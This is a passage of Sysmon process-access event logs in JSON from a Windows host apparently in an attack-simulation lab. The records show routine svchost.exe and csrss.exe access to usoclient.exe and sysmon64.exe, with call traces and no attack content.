{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2276\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-00100F3C0600}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2276","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-00100F3C0600}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-00100F3C0600}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-00100F3C0600}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 